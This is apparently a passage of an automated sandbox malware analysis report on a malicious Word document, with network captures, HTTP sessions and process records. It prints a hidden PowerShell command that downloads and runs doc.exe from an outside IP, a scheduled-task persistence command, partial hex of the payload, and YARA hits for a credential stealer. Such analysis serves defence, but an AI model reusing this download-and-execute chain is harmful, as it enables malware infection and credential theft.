                                          Sep 28, 2021 21:17:36.257668018 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.257685900 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.257699966 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.257716894 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.257721901 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.257741928 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.257745981 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.257755041 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.257781029 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.257786989 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.257797956 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.257818937 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.257850885 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.257865906 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.257873058 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.257878065 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.258203983 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.258229971 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.265327930 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.358557940 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.358642101 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.358666897 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.358688116 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.358697891 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.358711958 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.358717918 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.358721972 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.358747005 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.358752966 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.358767033 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.358792067 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.358812094 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.358833075 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.358846903 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.358853102 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.358855009 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.358856916 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.358875990 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.358900070 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.358907938 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.358912945 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.358916998 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.358999968 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.359025002 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.359054089 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.359060049 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.359066010 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.359070063 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.359096050 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.359119892 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.359165907 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.359174013 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.359177113 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.359179020 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.359709978 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.359720945 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.359756947 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.359803915 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.359813929 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.360781908 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.459652901 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.459692001 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.459717035 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.459741116 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.459767103 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.459794998 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.459819078 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.459819078 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.459837914 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.459842920 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.459845066 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.459855080 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.459901094 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.459924936 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.459947109 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.459969044 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.459969044 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.459975958 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.459979057 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.460158110 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.460208893 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.460210085 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.460215092 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.460218906 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.460253000 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.460314035 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.460345030 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.460350990 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.460354090 CEST4916780192.168.2.2213.92.100.208
                                          Sep 28, 2021 21:17:36.460355043 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.460380077 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.460402966 CEST804916713.92.100.208192.168.2.22
                                          Sep 28, 2021 21:17:36.460437059 CEST4916780192.168.2.2213.92.100.208

                                          HTTP Request Dependency Graph

                                          • 13.92.100.208

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.224916713.92.100.20880C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          TimestampkBytes transferredDirectionData
                                          Sep 28, 2021 21:17:36.156209946 CEST0OUTGET /doc/doc.exe HTTP/1.1
                                          Accept: */*
                                          UA-CPU: AMD64
                                          Accept-Encoding: gzip, deflate
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Host: 13.92.100.208
                                          Connection: Keep-Alive
                                          Sep 28, 2021 21:17:36.257581949 CEST1INHTTP/1.1 200 OK
                                          Date: Tue, 28 Sep 2021 19:17:36 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Last-Modified: Tue, 28 Sep 2021 06:16:15 GMT
                                          ETag: "9ba00-5cd08269fe9c0"
                                          Accept-Ranges: bytes
                                          Content-Length: 637440
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: application/x-msdos-program
                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2e b3 52 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 07 00 00 b0 02 00 00 00 00 00 f2 26 07 00 00 20 00 00 00 40 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 26 07 00 4f 00 00 00 00 40 07 00 20 ad 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 06 07 00 00 20 00 00 00 08 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 ad 02 00 00 40 07 00 00 ae 02 00 00 0a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 b8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 26 07 00 00 00 00 00 48 00 00 00 02 00 05 00 04 40 00 00 0c a6 02 00 03 00 00 00 0f 00 00 06 10 e6 02 00 90 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 01 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 2b 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0c 00 00 00 02 00 00 11 00 19 8d 12 00 00 01 0a 2b 00 06 2a 22 02 28 18 00 00 0a 00 2a 5e 02 14 7d 01 00 00 04 02 28 19 00 00 0a 00 00 02 28 08 00 00 06 00 2a 00 00 00 13 30 02 00 1d 00 00 00 03 00 00 11 00 16 0a 2b 0f 73 0c 00 00 06 28 1a 00 00 0a 00 06 17 58 0a 06 17 fe 04 0b 07 2d e9 2a 00 00 00 13 30 02 00 2b 00 00 00 04 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 1b 00 00 0a 00 00 02 03 28 1c 00 00 0a 00 2a 00 13 30 04 00 31 01 00 00 01 00 00 11 00 02 73 1d 00 00 0a 7d 03 00 00 04 02 28 1e 00 00 0a 00 02 7b 03 00 00 04 20 85 00 00 00 1f 33 73 1f 00 00 0a 6f 20 00 00 0a 00 02 7b 03 00 00 04 72 41 00 00 70 6f 21 00 00 0a 00 02 7b 03 00 00 04 1f 4b 1f 17 73 22 00 00 0a 6f 23 00 00 0a 00 02 7b 03 00 00 04 16 6f 24 00 00 0a 00 02 7b 03 00 00 04 72 41 00 00 70 6f 25 00 00 0a 00 02 7b 03 00 00 04 17 6f 26 00 00 0a 00 02 22 00 00 c0 40 22 00 00 50 41 73 27 00 00 0a 28 28 00 00 0a 00 02 17 28 29 00 00 0a 00 02 20 4a 01 00 00 20 0c 01 00 00 73 22 00 00 0a 28 2a 00 00 0a 00 7e 9f 00 00 04 72 51 00 00 70 28 0a 00 00 06 0a 02 06 6f 2b 00 00 0a 16 06 6f 2c 00 00 0a 28 2d 00 00 0a 28 09 00 00 06 00 02
                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL.Ra0& @@ @&O@ H.text `.rsrc @@@.reloc@B&H@@0rp+*0r+p+*0+*"(*^}((*0+s(X-*0+,{+,{o(*01s}({ 3so {rApo!{Ks"o#{o${rApo%{o&"@"PAs'((() J s"(*~rQp(o+o,(-(


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.224916813.92.100.20880C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          TimestampkBytes transferredDirectionData
                                          Sep 28, 2021 21:17:41.511833906 CEST669OUTGET /doc/doc.exe HTTP/1.1
                                          Host: 13.92.100.208
                                          Connection: Keep-Alive
                                          Sep 28, 2021 21:17:41.613955021 CEST671INHTTP/1.1 200 OK
                                          Date: Tue, 28 Sep 2021 19:17:41 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Last-Modified: Tue, 28 Sep 2021 06:16:15 GMT
                                          ETag: "9ba00-5cd08269fe9c0"
                                          Accept-Ranges: bytes
                                          Content-Length: 637440
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: application/x-msdos-program
                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2e b3 52 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 07 00 00 b0 02 00 00 00 00 00 f2 26 07 00 00 20 00 00 00 40 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 26 07 00 4f 00 00 00 00 40 07 00 20 ad 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 06 07 00 00 20 00 00 00 08 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 ad 02 00 00 40 07 00 00 ae 02 00 00 0a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0a 00 00 02 00 00 00 b8 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 26 07 00 00 00 00 00 48 00 00 00 02 00 05 00 04 40 00 00 0c a6 02 00 03 00 00 00 0f 00 00 06 10 e6 02 00 90 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 01 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 01 00 00 11 00 72 2b 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0c 00 00 00 02 00 00 11 00 19 8d 12 00 00 01 0a 2b 00 06 2a 22 02 28 18 00 00 0a 00 2a 5e 02 14 7d 01 00 00 04 02 28 19 00 00 0a 00 00 02 28 08 00 00 06 00 2a 00 00 00 13 30 02 00 1d 00 00 00 03 00 00 11 00 16 0a 2b 0f 73 0c 00 00 06 28 1a 00 00 0a 00 06 17 58 0a 06 17 fe 04 0b 07 2d e9 2a 00 00 00 13 30 02 00 2b 00 00 00 04 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 1b 00 00 0a 00 00 02 03 28 1c 00 00 0a 00 2a 00 13 30 04 00 31 01 00 00 01 00 00 11 00 02 73 1d 00 00 0a 7d 03 00 00 04 02 28 1e 00 00 0a 00 02 7b 03 00 00 04 20 85 00 00 00 1f 33 73 1f 00 00 0a 6f 20 00 00 0a 00 02 7b 03 00 00 04 72 41 00 00 70 6f 21 00 00 0a 00 02 7b 03 00 00 04 1f 4b 1f 17 73 22 00 00 0a 6f 23 00 00 0a 00 02 7b 03 00 00 04 16 6f 24 00 00 0a 00 02 7b 03 00 00 04 72 41 00 00 70 6f 25 00 00 0a 00 02 7b 03 00 00 04 17 6f 26 00 00 0a 00 02 22 00 00 c0 40 22 00 00 50 41 73 27 00 00 0a 28 28 00 00 0a 00 02 17 28 29 00 00 0a 00 02 20 4a 01 00 00 20 0c 01 00 00 73 22 00 00 0a 28 2a 00 00 0a 00 7e 9f 00 00 04 72 51 00 00 70 28 0a 00 00 06 0a 02 06 6f 2b 00 00 0a 16 06 6f 2c 00 00 0a 28 2d 00 00 0a 28 09 00 00 06 00 02
                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL.Ra0& @@ @&O@ H.text `.rsrc @@@.reloc@B&H@@0rp+*0r+p+*0+*"(*^}((*0+s(X-*0+,{+,{o(*01s}({ 3so {rApo!{Ks"o#{o${rApo%{o&"@"PAs'((() J s"(*~rQp(o+o,(-(


                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Start time:21:17:20
                                          Start date:28/09/2021
                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                          Imagebase:0x13f130000
                                          File size:1423704 bytes
                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          General

                                          Start time:21:17:23
                                          Start date:28/09/2021
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
                                          Imagebase:0x13f640000
                                          File size:473600 bytes
                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.426889851.00000000001E0000.00000004.00000020.sdmp, Author: Florian Roth
                                          Reputation:high

                                          General

                                          Start time:21:17:24
                                          Start date:28/09/2021
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
                                          Imagebase:0x13f640000
                                          File size:473600 bytes
                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000005.00000002.429130471.0000000000260000.00000004.00000020.sdmp, Author: Florian Roth
                                          Reputation:high

                                          General

                                          Start time:21:17:24
                                          Start date:28/09/2021
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://13.92.100.208/doc/doc.exe','C:\Users\user\AppData\Roaming\doc.exe');Start-Process 'C:\Users\user\AppData\Roaming\doc.exe''
                                          Imagebase:0x13f640000
                                          File size:473600 bytes
                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Reputation:high

                                          General

                                          Start time:21:17:29
                                          Start date:28/09/2021
                                          Path:C:\Users\user\AppData\Roaming\doc.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\AppData\Roaming\doc.exe'
                                          Imagebase:0x200000
                                          File size:637440 bytes
                                          MD5 hash:D8BC91E846E3D624814D4557681F33AD
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.446591152.00000000023F3000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, Author: Florian Roth
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, Author: Florian Roth
                                          • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000009.00000002.448256879.00000000033A9000.00000004.00000001.sdmp, Author: Joe Security
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 31%, ReversingLabs
                                          Reputation:low

                                          General

                                          Start time:21:17:33
                                          Start date:28/09/2021
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\maBdogbw' /XML 'C:\Users\user\AppData\Local\Temp\tmp2C00.tmp'
                                          Imagebase:0xde0000
                                          File size:179712 bytes
                                          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:21:17:34
                                          Start date:28/09/2021
                                          Path:C:\Users\user\AppData\Roaming\doc.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Users\user\AppData\Roaming\doc.exe
                                          Imagebase:0x200000
                                          File size:637440 bytes
                                          MD5 hash:D8BC91E846E3D624814D4557681F33AD
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          General

                                          Start time:21:17:34
                                          Start date:28/09/2021
                                          Path:C:\Users\user\AppData\Roaming\doc.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Users\user\AppData\Roaming\doc.exe
                                          Imagebase:0x200000
                                          File size:637440 bytes
                                          MD5 hash:D8BC91E846E3D624814D4557681F33AD
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          General

                                          Start time:21:17:35
                                          Start date:28/09/2021
                                          Path:C:\Users\user\AppData\Roaming\doc.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Roaming\doc.exe
                                          Imagebase:0x200000
                                          File size:637440 bytes
                                          MD5 hash:D8BC91E846E3D624814D4557681F33AD
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.448380598.00000000005F5000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000E.00000003.448441676.00000000005F8000.00000004.00000001.sdmp, Author: Florian Roth
                                          • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000E.00000003.448441676.00000000005F8000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.448429506.0000000000603000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.448429506.0000000000603000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.448388466.00000000005FC000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.448388466.00000000005FC000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 0000000E.00000003.448480834.00000000005F5000.00000004.00000001.sdmp, Author: Florian Roth
                                          • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000E.00000003.448480834.00000000005F5000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.448500555.0000000000607000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.448500555.0000000000607000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000002.694525179.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
